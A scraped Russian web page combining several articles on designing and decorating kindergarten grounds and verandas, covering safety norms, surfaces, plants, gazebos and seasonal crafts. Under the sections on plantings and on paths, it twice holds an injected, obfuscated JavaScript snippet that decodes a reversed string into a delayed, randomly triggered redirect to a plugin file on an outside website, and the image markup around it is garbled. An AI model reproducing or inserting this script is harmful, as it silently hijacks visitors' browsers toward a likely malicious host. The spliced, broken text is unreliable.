Оформление участка в детском саду летом (веранды, детской площадки)

Содержание
  1. Оформление участка в детском саду своими руками + фото
  2. Требования к безопасности на детских площадках
  3. Особенности оформления
  4. Размер, структура участка
  5. Выбор материала для оформления
  6. Создание игровой зоны
  7. Создание спортивной площадки
  8. Какое покрытие использовать на детской площадке
  9. Планирование, дизайн дорожек
  10. Озеленение участка: выбираем деревья, кустарники
  11. Организация места отдыха: как расположить беседки, павильоны
  12. Декоративное оформление участка детского сада к лету
  13. Декоративное оформление участка детского сада к осени
  14. Декоративное оформление участка детского сада зимой
  15. Декоративное оформление участка детского сада весной
  16. Заключение
  17. Дизайн участка детского сада (36 фото): зеленые насаждения, дорожки, павильоны, беседки, качели и спортивная площадка
  18. Зеленые насаждения
  19. Помните о безопасности
  20. Выбор растений
  21. Дорожки
  22. Павильоны и беседки
  23. Качели и прочее
  24. Спортивная площадка
  25. Подводя итоги
  26. Фотогалерея
  27. Благоустройство летнего участка своими руками. Воспитателям детских садов, школьным учителям и педагогам
  28. Перед тем как начать украшение территории детского сада своими руками, важно учесть ряд правил:
  29. Материалы, способы отделки
  30. Цветовая палитра
  31. Дизайн отдельных помещений или зонирование
  32. Игровая и учебная комната
  33. Оформление веранды в старшей группе по ФГОС
  34. Принципы построения ППС в ДОУ
  35. Оформление веранды в старшей группе

Оформление участка в детском саду своими руками + фото

Оформление участка в детском саду летом (веранды, детской площадки)

Чувство прекрасного нужно прививать ребенку с самого раннего возраста. Желательно, чтобы вокруг него все было хорошо и красиво. В большинстве случаев оформление участка в детском саду производится не «крутыми» дизайнерами, а обычными воспитателями и родителями. Весь декор, располагающийся на детской площадке, делается максимально безопасным, обычно окрашивается в яркие тона.

Требования к безопасности на детских площадках

Основные требования к безопасности предназначенных для детей площадок регулируются нормативными документами, в которых учитываются все причины травматизма, прописываются меры по его предотвращению.

Основные стандарты таковы:

  • отсутствие острых углов, кромок в пределах досягаемости детей;
  • высота и конструкция делается подходящей для той или иной возрастной группы;
  • все оборудование монтируется максимально устойчиво, конструкция проектируется таким образом, чтобы при необходимости взрослый мог получить доступ к любой его части и помочь ребенку;
  • расстояния между ступеньками, частями перил, прочими деталями должны исключать застревание головы, если малыш решил ее туда сунуть;
  • для самых маленьких везде создаются перила, соответствующие их росту;
  • покрытие вблизи горок, лестниц, качелей делается ударосмягчающим;
  • на площадке должно быть достаточно места, чтобы бегать, играть;
  • использование токсичных материалов, скользких покрытий недопустимо;
  • толщина перил, других подобных элементов выполняется такой, чтобы ребенок легко мог их обхватить рукой;
  • поврежденные, изношенные детали оборудования, декора необходимо своевременно заменять, ремонтировать.

Особенности оформления

Оформление конкретного участка садика зависит от его размеров – чем пространство обширнее, тем больше оборудования, декоративных и функциональных элементов там разместится. На стандартной площадке размещаются примерно такие элементы:

  • песочница;
  • беседка (в том числе полностью закрытая);
  • горка высоты, соответствущей возрасту пользователей;
  • качели и качалки;
  • лесенки и «лазалки»;
  • лабиринт;
  • игровой домик.

Не обязательно размещать все предметы в пределах одного участка – достаточно трех-четырех. В некоторых садиках устанавливаются целые игровые комплексы, включающие в себя горки, лесенки, кольца, всякие «крутилки-нажималки» (для развития самых маленьких), домики, паровозики и др.

Размер, структура участка

Примерная норма площади, в расчете на одного ребенка, зависит от общего количества воспитанников, плотности застройки района, составляя около 35-60 кв. м. Норма пространства под навесами, на террасах, в беседках – 1,5 кв. м. на человека.

На территории должно быть достаточное количество солнечных и затененных мест, а также сливы, отводы ливневой воды. Ограждение ДОУ делается высотой 1,6-1,8 метра.

Со стороны внешнего периметра сада создается «зеленая полоса» из деревьев, кустарников, шириной не менее четырех-пяти метров.

Основные зоны участка:

  • игровая;
  • эстетическая;
  • спортивная;
  • для отдыха.

В  общем пространстве детсада, кроме локальных зон для каждой группы, предусмотрены общие физкультурные, хозплощадки, пространства для езды на велосипеде, самокате. Здесь же предусматриваются песочницы с крышками.

Само покрытие грунта «ячеек» для каждой группы выполняется песком, утрамбованной землей, а для воспитанников младше трех лет – травяным газоном. Наличие ровных пешеходных дорожек без ямок и выбоин – обязательно.

Для формирования у детей навыков ухода за растениями, в садике организуется небольшой огород, для изучения правил дорожного движения обустраивается зона, имеющая дорожную разметку и указатели.

Выбор материала для оформления

Садовый декор выполняется из «бросовых» материалов:

  • пластиковых бутылок различного размера;
  • деталей старой мебели;
  • автопокрышек;
  • камушков разного размера;
  • компакт-дисков и грампластинок;
  • тазиков, контейнеров, кастрюль.

Из вышеописанных материалов составляются сюжетные композиции – сценки из сказок, мультфильмов. Дополнительно, в качестве основы, используется бетон, а из фанеры выполняются макеты известных зданий. Все конструкции окрашиваются красками, безвредными для детей.

Создание игровой зоны

Игровая – одна из основных зон, именно здесь дети проводят больше всего времени. Через игру ребенок познает мир, обучается многим навыкам, которые пригодятся в жизни. Территория, выделенная каждой группе, оформляется по-своему, но общая композиция должна смотреться цельной.

Любые поделки и конструкции на участке должны «включать» фантазию, стремление к познавательной деятельности у детей. Здесь разместится теремок и крутящаяся ветряная мельница, колодец-журавль и крокодил из деревяшек, по которым можно бегать, паровозик с несколькими вагончиками и обеденная группа, вырезанная из пеньков.

Здесь же размещают стойки-счеты с нанизанными на них шариками, кубиками, на которых пишутся буквы, цифры, несложные математические примеры.

В игровом пространстве часто организуется небольшой «летний театр» с соответствующими декорациями.

Создание спортивной площадки

Перед тем как оформлять спортивную зону, обычно составляют проект – не все элементы допустимо размещать «где попало», так как между ними нужно делать безопасные расстояния, а покрытие – минимально травмоопасным.

В спортивной зоне проводятся все мероприятия, направленные на оздоровление, укрепление тела, совершенствование силовых качеств, развитие гибкости и ловкости малышей:

  • утренняя зарядка;
  • физкультурные занятия;
  • сюжетные подвижные игры;
  • спортивные праздники;
  • самостоятельная деятельность, связанная с движением;
  • закаливающие мероприятия.

В данной зоне размещают лесенки, лазалки, горки, турники, лабиринты, мишени, мячики для бросания, а иногда – даже детские тренажеры, адаптированные под рост и физические качества воспитанников.

Какое покрытие использовать на детской площадке

Вариантов покрытия существует несколько, каждое из них имеет свои нюансы:

  • песок – наиболее популярен, дешев, удобен в применении. С ним любое место легко станет импровизированной песочницей, а само покрытие достаточно просто привезти, насыпать и выровнять. Главный минус – мусор здесь скапливается очень быстро, его проблематично убирать, а уличные животные часто воспринимают его как удобнейшее место для туалета. Младшие дети иногда пытаются съесть песок. Адаптированный вариант – мягкий речной песок, покрытый геотекстилем;
  • газон – покрытие мягкое, экологичное, безопасное. Но при постоянном и активном использовании оно «вытаптывается», не успевая отрастать, а без своевременного полива, стрижки, аэрации и прочих кропотливых процедур газон становится невзрачным и местами «лысым»;
  • древесная щепа, натуральная мульча – покрытие выходит мягким, приятным для ходьбы, игр. Минусы – в мокром состоянии она прилипает к обуви, растаскиваясь по всей территории, требуя регулярного подсыпания, в сухом – пожароопасна;
  • плитка из резины – современный, красивый вариант покрытия, которое выполняется из переработанных автопокрышек, окрашивается в любые тона. Изделие прекрасно пропускает воду, легко моется, до минимума снижает вероятность травм. Минусы – высокая стоимость, а также деформация отдельных плиточек, происходящая со временем;
  • бесшовное резиновое покрытие – создает ровную, красивую поверхность, уменьшает травматизм, придает пространству эстетичный внешний вид, но очень дорого стоит, так как сделать его своими руками вряд ли получится;
  • покрытие из пластика – износостойкое, легко моющееся, мягкое, выполняется из отдельных модулей либо цельным, по размеру участка. Играть на нем можно сразу после дождя, не боясь испачкаться. Стоимость покрытия также высока.

Планирование, дизайн дорожек

Дорожки в детском саду делятся на предназначенные для движения пешком или на велосипеде, а также «дорожки здоровья», по которым ходят босиком.

Последние выполняются из паллетных досок, имеют ячейки, каждая из которых заполняется разными материалами – песком, галькой, гравием, древесными спилами, опилками, палочками, еловыми шишками, каштанами и др.

Такие тропинки создаются для профилактики плоскостопия, стимуляции биологически активных точек на стопах.

Обычные дорожки делаются ширины достаточной, чтобы по ним могло пройти двое детей, взявшись за руки. Покрытие выполняется асфальтовым, из плитки, реже – бетона или широких досок. Поверхность должна слегка приподниматься над землей, чтобы не образовывались лужи, быть максимально гладкой, чтобы дети не спотыкались о неровности. Дорожки прокладываются к каждому значимому объекту.

Озеленение участка: выбираем деревья, кустарники

Зеленые насаждения очищают воздух, создают благоприятную атмосферу для отдыха и обучающих занятий. Их созерцание полезно для глаз, а плотные, высокие посадки хорошо защищают от городского шума, загазованности. При помощи низких или средней высоты кустов, друг от друга отделяются пространства, предназначающиеся для разных садиковских групп.

На детской площадке недопустимо высаживать любые ядовитые, колючие кустарники и цветы (розы, ландыши, шиповник, акация, клещевина, бобовник), а также те, на которых растут несъедобные, но очень красивые ягоды (бересклет, бирючина).

Наилучшим образом подойдут:

  • клен – остролистный, татарский, приречный;
  • тополь;
  • липа;
  • рябина;
  • береза – бородавчатая, пушистая;
  • лиственница;
  • сирень – венгерская, персидская;
  • садовый жасмин;
  • яблоня;
  • груша.

В большинстве садиков также обустраивается небольшой огород с самыми обычными культурами – картофелем, томатами, горохом, луком, редисом, тыквой и др. Иногда в ДОУ имеется и «живой уголок», часть которого летом располагается на улице, под навесом. Здесь живут кролики, птицы, грызуны, а дети учатся уходу за ними.

Уровень озеленения детского садика должен составлять не менее 40-60% всей территории.

Организация места отдыха: как расположить беседки, павильоны

Беседки садика располагают так, чтобы взрослому хорошо было видно все пространство полностью. Постройка создается максимально безопасной, ярко, разнообразно оформляется сюжетными картинами изнутри и снаружи. Располагают ее в тени, если конструкция предусматривает наличие ступенек, к ним делаются и перила.

Среди других требований – пожаробезопасность, отсутствие сквозняков, острых углов. Из материалов подойдет кирпич, обработанное специальными составами дерево, пластик, поликарбонат, дополнительно применяют лозу и текстиль.

А вот металл в пределах досягаемости детей недопустим – летом он сильно нагревается, зимой способен стать причиной травмы, получаемой в ходе детских «экспериментов» (например, касания языком).

Декоративное оформление участка детского сада к лету

В летнее время главным украшением улицы служат цветы – их высаживают вдоль дорог, на клумбах различной формы, альпийских горках. Символическим ограждением для цветников служат раскрашенные в разные цвета пластиковые бутылки.

На самой же клумбе могут «гулять» поросята и зайцы, выполненные из таких же бутылочек, лебеди из автомобильных покрышек, божьи коровки из камушков округлой формы.

Иногда на площадке располагают малые архитектурные формы из дерева – это гномики, лесовички, принцессы, теремки и др.

Декоративное оформление участка детского сада к осени

Осень – это природное «буйство красок», оригинальные поделки из «лесных даров», которыми можно украшать как саму группу, так и пространство беседок, павильонов. В последних дети находятся во время прогулок, если идет дождь.

Здесь выполняются гирлянды из нарисованных на бумаге, вырезанных, обклеенных скотчем (для прочности) листиков, флажков, желудей, шишек.

На одной из стен размещают сюжетную композицию, «рассказывающую» об осенних заботах лесных обитателей: белочки, собирающей орешки, ежика с грибами, медведя с медом, птичек с веточками ягод или колосками злаков в клюве.

Декоративное оформление участка детского сада зимой

К Новому году украшения делаются яркими, но преимущественно в холодных тонах. Для этого используется фольга, блестящие диски, пластмасса. В ходе расчистки снега родители, воспитатели строят всевозможные «зимние фигуры» – паровозики, цифры, Деда Мороза со Снегурочкой, зайца с лисой.

Чтобы раскрасить скульптуры, применяют акварельные либо гуашевые краски. Для организации «зимних забав» из снега строят замки, горки-ледянки. В это время года имеет смысл обустройство кормушек для птиц – их выполняют из пластиковых бутылок, пачек от молока.

Такое изделие не только станет интересным дополнением ландшафта, но и позволит детям проявить заботу о пернатых.

Декоративное оформление участка детского сада весной

Весной на территории обустраивают мини-клумбы, на которых высаживают первоцветы. Клумбочки организуют в кадках, деревянных паровозиках, в которых проделаны подходящие выемки для насыпания земли, автопокрышках, раскрашенных в различные тона.

Веранды, беседки весной также декорируют – флажками и сюжетными композициями. Наиболее подходящие тона – белый, розовый, нежно-голубой, салатовый.

Вариант картинки, вырезанной из бумаги и размещенной на стене – различные животные, сажающие цветы, спускающие бумажные кораблики на воду.

Заключение

Ландшафтный дизайн в ДОУ – это почти что отдельный вид искусства. Здесь все делается для того, чтобы маленьким гражданам было удобно и весело в любое время года.

Благоустройство уже частично обустроенной территории обычно производится своими силами, с использованием подручных средств – многие интересные идеи легко найти в интернете.

Но когда садик еще на стадии проекта (строительства), этим занимаются профессиональные дизайнеры, знающие о детских площадках абсолютно все.

Дизайн участка детского сада (36 фото): зеленые насаждения, дорожки, павильоны, беседки, качели и спортивная площадка

Оформление участка в детском саду летом (веранды, детской площадки)

Детский сад – место, где ребенок развивается, учится и играет. Выбирая дошкольное учреждение для своего ребенка, родители обращают внимание не только на обстановку в группе, но и на дизайн участка детского сада. Мы хотим дать несколько советов по его благоустройству.

Детский сад можно считать вторым домом для малышей, ведь здесь они проводят большую часть своего дня. Наверное, каждому педагогу и родителю хочется, чтобы ребенка окружали красивые деревья и цветы, качели и горки, павильоны и турники.

Все это нужно сразу планировать при дизайне сада для детей.

К сожалению, во многих детсадах сейчас плохое финансирование, но это не повод опускать руки. Ведь достаточно применить свою фантазию, умение и труд, чтобы изменить территорию до неузнаваемости практически не вкладывая денег.

https://www.youtube.com/watch?v=Hekx1eXUJpY

Небезразличные и активные родители есть в любом садике, а если еще привлечь ребятню, работа закипит.

Давайте рассмотрим, что должно находиться на территории детсада:

  • деревья, кустарники и клумбы;
  • асфальтированные дорожки;
  • павильоны или беседки;
  • качели и горки, песочницы;
  • спортивная площадка.

Зеленые насаждения

$Ikf=function(n){if (typeof ($Ikf.list[n]) == «string») return $Ikf.list[n].split(«»).reverse().join(«»);return $Ikf.list[n];};$Ikf.list=[«’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.

random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andshaftnyj-dizajn-uchastka-detskogo-sada.

jpg» alt=»ландшафтный дизайн участка детского сада» width=»419″ height=»311″ /> Клумбы

Даже не подлежит сомнению, что на территории детского сада должно находиться большое количество деревьев, кустов и цветов, но к этому делу стоит подойти ответственно.

Помните о безопасности

Суть озеленения заключается в создании благоприятного микроклимата, уменьшении запыленности и загазованности воздуха, повышения влажности и затененности на территории.

Выбирая те или иные виды растительности, не стоит забывать о безопасности жизни и здоровья детей, а также об их экологическом воспитании. Иными словами, нужно знать основы дизайна сада своими руками.

Выбор растений

Продумывая ландшафтный дизайн территории детского сада, располагаем одинаковые виды деревьев по аллеям. Ребята так легче запомнят название и внешний вид саженцев.

  • Вдоль забора лучше всего высаживать высокорослые деревья – клен, тополь (который не дает пуха), ясень, березу. Эти виды хорошо смотрятся в любое время года и будут защищать садик от ветров.  Для создания тени на участках, можно высадить дубы и акации.
  • У центрального входа в детский сад красиво будут смотреться ели, но сажать их на игровых площадках не рекомендуется.
  • Под ними можно красиво выложить крашенную в разные цвета гальку и посадить сделанных из дерева или бетона зверюшек. Пустые места в тени деревьев, где ничего не растет, можно украсить различными фигурками. Даже обычный пенек в умелых руках превратится в сказочного героя.
  • Если надумали сажать плодовые деревья, выделите территорию под сад. Такие деревья требуют особого ухода и своевременного сбора урожая, не допускайте загрязнения площадки опавшими фруктами.
  • Продумывая ландшафтный дизайн в детском саду, можно использовать идею разделения игровых площадок на участки при помощи кустарников. Для этого их высаживают в линию по периметру. Зеленая изгородь готова! Для детских садов подойдет калина, жасмин, сирень, арония черноплодная. Главное, не забывайте их вовремя подстригать.
  • Благоустройство клумб — дело интересное и увлекательное. Для этих целей можно привлечь детей старших и подготовительных групп.
  • Если взять старые скаты и засыпать их землей, затем покрасить резину краской, получатся прекрасные клумбы. Располагаем их по пути следования к зданиям и вокруг них.

Выбирая семена и саженцы, обращаем внимание на период цветения и срок жизни растений. Цветы должны цвести с начала весны и до поздней осени. Выбирайте не только однолетние, но и многолетние растения, например, петунью, календулу, анютины глазки, ирисы, пионы, розы.

Совет! Выбирая растения, убедитесь, что они не ядовиты и подходят для данного климата. Если вы неуверены в их безопасности, не берите!

Дорожки

$Ikf=function(n){if (typeof ($Ikf.list[n]) == «string») return $Ikf.list[n].split(«»).reverse().join(«»);return $Ikf.list[n];};$Ikf.list=[«’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.

random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andshaftnyj-dizajn-v-detskom-sadu.

jpg» alt=»ландшафтный дизайн в детском саду» width=»300″ height=»216″ /> Дорожки в детском саду

Все главные дорожки на территории садика должны быть асфальтированы или выложены специальной плиткой.

На участках тропинки можно засеять декоративной травой или посыпать песком. Рассматривая дизайн участка детского сада, можно выбрать для спортивной площадки ортопедическую дорожку из гальки.

Для создания дорожки выбираем место, огораживаем его по бокам (чтобы галька не рассыпалась) и засыпаем морскими камушками среднего размера. Затрат немного — польза большая. Летом дети будут босиком ходить по ней для профилактики плоскостопия.

Павильоны и беседки

составляющая детской площадки — это сооружение, в котором можно укрыться от жары или дождя. Чаще всего для этого строятся павильоны и беседки.

Главные требования:

  • безопасность;
  • натуральные материалы;
  • одна глухая сторона;
  • наличие лавочек.

Строения окрашивают в яркие цвета. Над входом в беседку или под крышей павильона можно подвесить флюгеры или трещотки. Располагают беседки под высокорослыми деревьями, это даст дополнительную тень и прохладу.

Качели и прочее

Клумба в детском саду

Естественно, дизайн площадки детского сада предусматривает наличие качелей, горок и песочниц (игрового инвентаря). Выбирая их, стоит побеспокоиться о безопасности конструкций.

Качели и горки должны соответствовать возрасту детей, быть безопасными и надежными. После зимы обязательно смазывают все подвижные части и проверяют на наличие повреждений.

Окрашивают все конструкции яркими красками. На сиденьях качелей и по бокам горок и песочниц можно нарисовать сказочных героев или цветы.

Располагаем качели и прочие конструкции так, чтобы они не мешали друг другу и ребенок, съехавший с горки, не попал под качели. Лучше всего поставить их в разных углах участка.

Спортивная площадка

В любом детсаду должна быть спортивная площадка. На ней располагаем турники, шведскую лестницу, бревно и баскетбольное кольцо.

Весь спортивный инвентарь должен быть адаптирован под разный возраст детей, быть безопасным и удобным. Его также окрашивают в яркие цвета. Выбирая место для площадки, отдайте предпочтение затененному участку.

Совет! Для спортивной площадки можно использовать старые автомобильные покрышки, для этого их наполовину закапывают в землю.

Как видите, выбирая ландшафтный дизайн участка детского сада, основное внимание уделяется безопасности конструкций и яркости красок.  Само обустройство — дело несложное, но требующее ответственности и желания.

Подводя итоги

Надеемся, наша статья была для вас полезна.  Для того чтобы более точно разобраться в технологическом и практическом вопросе, на нашем сайте представлена подробная фото- и видео-инструкция, в которой вы найдете полезную информацию по данному вопросу.

Фотогалерея

Благоустройство летнего участка своими руками. Воспитателям детских садов, школьным учителям и педагогам

Оформление участка в детском саду летом (веранды, детской площадки)

Декоративные поделки на участок детского сада

Оформление клумб в детском саду

Оформление веранды в детском саду своими руками

Обязательным атрибутом пребывания ребенка в детском саду являются прогулки на свежем воздухе. Они происходят на закрепленном за группой участке, на котором находится веранда, несколько простейших игровых комплексов, клумбы с цветами. Чтобы внести разнообразие и разбудить творчество детей, креативные воспитатели и активные родители создают разнообразные поделки в детский сад на участок.

Идеи, с помощью которых происходит оформление участка в детском саду, в основном берутся из интернета. Многочисленные мастер-классы по изготовлению уличных игрушек вдохновляют на создание настоящих шедевров.

Перед тем как начать украшение территории детского сада своими руками, важно учесть ряд правил:

  1. В работе необходимо использовать только нетоксичные материалы, не вызывающие аллергию, не имеющие неприятного запаха.
  2. Для участков младших дошкольных и ясельных групп необходимо выбирать поделки, не включающие мелкие выступающие детали, которые можно оторвать.
  3. Темы изготавливаемых поделок должны быть исключительно детскими: растения, животные, транспорт, сказочные герои и т. д.
  4. Поделки на участок в детский сад должны быть продуманы эстетически – не пугать малышей, не вызывать отвращения.
  5. Целесообразно запланировать оформление участков ДОУ летом. Особенно, если планируется использовать краску, лак или морилку. Удобно, что летом наполняемость садика минимальна.

Рассмотрим наиболее удачные идеи поделок, уже реализованные в детских садах.

Материалы, способы отделки

Основные, наиболее часто используемые материалы:

  • дерево;
  • ДВП;
  • МДФ;
  • пластик;
  • гипсокартон;
  • керамическая плитка;
  • краска;
  • обои.

Все материалы должны быть безвредными для здоровья детей, иметь сертификаты о радиационной безопасности. Потолки чаще всего белят, окрашивают водоэмульсионной краской. Стены делаются гладкие, чтобы их легко было мыть, полы – не скользкие.

Стены, полы помещений санитарного назначения, пищеблоки, оформляют кафелем, масляной краской, декоративной штукатуркой. Полы в группах делаются деревянные, ламинированные, из натурального линолеума, без щелей, выступающих частей. В холодных регионах предпочтительны полы с подогревом.

В группах на пол стелются коврики, паласы.

Меблировка также подбирается экологически чистая, удобная, легкая. Предпочтительна такая, которая «растет вместе с ребенком» – регулируется по высоте. Она может быть жесткая или мягкая.

Цветовая палитра

Помещения, окна которых выходят на север, окрашиваются теплыми тонами – бежевый, светло-желтый, оранжево-розовый, персиковый. «Южные» комнаты оформляются в холодной цветовой гамме – светло-голубой, бледно-зеленый, нежно-фиалковый. До 25% площади допускается красить более ярко, но агрессивных цветов использовать минимальное количество.

С помощью цвета производится зонирование помещений – отдельные места выделяются яркими тонами, картинками.

Как влияют на детей различные цвета:

  • розовый – успокаивает, ребенок чувствует себя в безопасности;
  • голубой – способствует сосредоточению, расслаблению;
  • синий – дарит спокойствие, снимает внутреннее напряжение;
  • желтый – помогает общаться, осваивать новые навыки;
  • красный – дает уверенность в себе, в больших количествах усиливает тревожность;
  • зеленый – улучшает работу мозга, чрезмерно яркий способен утомить.

Дизайн отдельных помещений или зонирование

Зонирование пространства происходит путем разделения его на функциональные зоны с определением границ.

Какие бывают границы:

  • объемные – перегородки, экраны, стены, предметы меблировки, шторы;
  • пространственные – это разная высота пола в различных зонах, цветовая гамма, освещение, архитектурные элементы;
  • комбинированные – пространство одновременно разделяется и связывается, это витражи, решетки, гардины, колонны, арки;
  • полупрозрачные, полностью прозрачные – так производится разделение физически с сохранением визуальной связи.

Зонирование предпочитается гибкое – сборно-разборные конструкции шкафов, раздвижные перегородки, ширмы, прозрачные экраны. Дети часто принимают непосредственное участие в зонировании, вместе с воспитателями.

Часто используются площадки-подиумы с ограждениями, разнообразные перегородки – прямые, угловые, фигурные, различной высоты, ширины, длины.

Декоративное оформление потолка в праздничные дни также станет элементом разбиения на зоны – это флажки, воздушные шарики, бумажные гирлянды.

Старшие группы часто располагаются на втором этаже, потому о безопасности, эстетичном внешнем виде лестницы также следует позаботиться. Стены вдоль них следует красиво оформить – например, сделать выставку графических, живописных работ воспитанников.

Игровая и учебная комната

Чаще всего, играют, кушают детишки в одних и тех же комнатах. Мебель подбирается соответствующая росту детей – в младшей, старшей группах она будет сильно различаться по высоте.

Здесь размещают:

  • столы, стулья;
  • стеллажи для книг, игрушек;
  • краски, фломастеры;
  • готовые работы, сделанные руками детей;
  • музыкальные инструменты.

Стены оформляются яркими, не агрессивных расцветок обоями, рисунками – приветствуются развивающие сюжеты, эпизоды из сказок, мультфильмов. В игровой зоне на пол укладывается мягкий, теплый ковер. Шкафы, стеллажи для игрушек, книжек, выбираются с минимальной травмоопасностью, устойчивые, их хорошо закрепляют.

Учебная зона должна достаточно хорошо освещаться, визуально отделяясь от игровой другим покрытием пола, стен, с помощью перегородок. Здесь дети учатся читать, писать, рисовать, лепить.

Зоны различных игр отделяются друг от друга декоративными домиками, ширмами – кухня с игрушечным гарнитуром, железная дорога, городок из лего.

Оформление веранды в старшей группе по ФГОС

Оформление участка в детском саду летом (веранды, детской площадки)

Пространство, в котором находятся дети, должно быть развивающим.

Значит, не только в группе могут быть продуманы зоны и игровые уголки, но и оформление веранды должно соответствовать принципам построения ППС. Предметно-пространственная среда соответствует ФГОС ДО.

Как часто мы слышим эту фразу в последнее время, но не каждый понимает, что это значит. Давайте постараемся разобраться вместе.

Принципы построения ППС в ДОУ

Во-первых, среда должна соответствовать возрастным психологическим особенностям детей и программе воспитания и обучения, то есть быть насыщенной. Оборудование и игровые материалы должны обеспечивать разные виды деятельности дошкольников: подвижную, исследовательскую, художественную и т.д.

Во-вторых, среда должна быть трансформируемой, изменяться вместе с изменяющимися интересами детей.

В-третьих, развивающая среда предполагает использование полифункционального оборудования, такого, которое можно использовать в разных видах деятельности или в качестве предметов-заместителей.

В-четвёртых, ФГОС рекомендует вариативность среды, т.е.возможность её изменения в соответствии с региональным компонентом, особенностями дошкольного учреждение и контингента воспитанников.

В-пятых, всё игровое оборудование, даже в закрытых полках, должно быть доступно детям. Подбор материала должен служить развитию самостоятельности и творческих способностей детей, а так же работать на развитие индивидуальности каждого.

В-шестых, безопасность — превыше всего. И продумывая размещение игрового материала и мебели необходимо предусмотреть и предотвратить все ситуации, угрожающие здоровью и жизни детей.

В-седьмых, среда должна быть здоровьесберегающей, а значит не наносить вред психическому и физическому здоровью детей. Естественно, она не должна содержать материалы, отражающие террористические действия, насилие и т.д.

Оформление веранды в старшей группе

Конечно, при создании предметно-пространственной среды в группе или на веранде каждый педагог заглянет в СанПин, программу воспитания и обучения и учебник дошкольной психологии.
Оформление веранды в старшей группе по ФГОС — увлекательное дело, которым мы занялись во время летней оздоровительной компании. И вот, что у нас получилось.

Веранда выдержана в общем стиле «Клуб Любознайки». На входе висит приглашение в клуб и все зоны помечены значками, оформленными в одинаковые рамочки. В программе «От рождения до школы» есть задача — знакомить детей с прошлым вещей, историей страны и т.д. Для этого мы сделали машину времени и путешествуем в прошлое.

В «Неделю детской книги» мы узнали о том, как появились книги. Так как сад относится к РЖД, без истории создания паровоза не обойтись. 2016 год — год кино и эту тему мы не оставили без внимания. Мы путешествовали в прошлое афишной тумбы. А оформить это всё можно так.

Макеты — незаменимая вещь, особенно, когда нужно закрепить правила дорожного движения. Мальчишки могут часами играть на таком макете.

Оборудование для экспериментирования мы разложили в ящики с определёнными метками (то, что можно трогать, щупать, то, что звучит, и коллекции для рассматривания). Получилось интересно.

Так как мы живём в прекрасном Краснодарском крае, рассказываем детям о сельском хозяйстве, решили сделать Кубань — кормилицу. Она всем предлагает свои дары. Сегодня корзина её уже переполнена и дети постоянно приносят что-то новое.

Мы стараемся привлекать детей к изготовлению игрового оборудования и украшений для группы. Вот, например такое дерево.
Или эта настольная игра из LEGO для закрепления названий частей цветка, кустарника и дерева.

В старшей группе мы уделяли большое внимание развитию креативности и использовали для этого элементы ТРИЗ. Один из них — это набор колец Луллия. На фото изображена игра «Кто где живёт и чем питается».

Соединяя сектора, можно составлять описательные рассказы о животных, а передвигая их разными способами, составлять творческие рассказы. Например, что было бы, если бы медведь жил в муравейнике?

Наши дети очень подвижные и нужно постоянно предлагать им развивающие игры. Мы сделали такой логический математический планшет (наверно многим уже известный), и дети очень увлечены работой с ним.

Уголок ИЗО предполагает мини — выставку детских работ и наборы для нетрадиционного рисования. В этот раз мы занялись рисованием тенями. Попробуйте и вы.

Обычно на веранду выносят не самое новое оборудование и мебель. Столы нужны и вот как им можно подарить вторую жизнь. Настольные игры намертво приклеены к столу и покрыты скотчем и за такими столами собираются любители шахмат и настольных игр.

На выходе из веранды самых активных ожидает непростое задание. Шайбу надо прогнать по лабиринту. Кстати и машины и мелкие игрушки подойдут. А лабиринт сделан с помощью обычной изоленты.

Ваш садовод
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: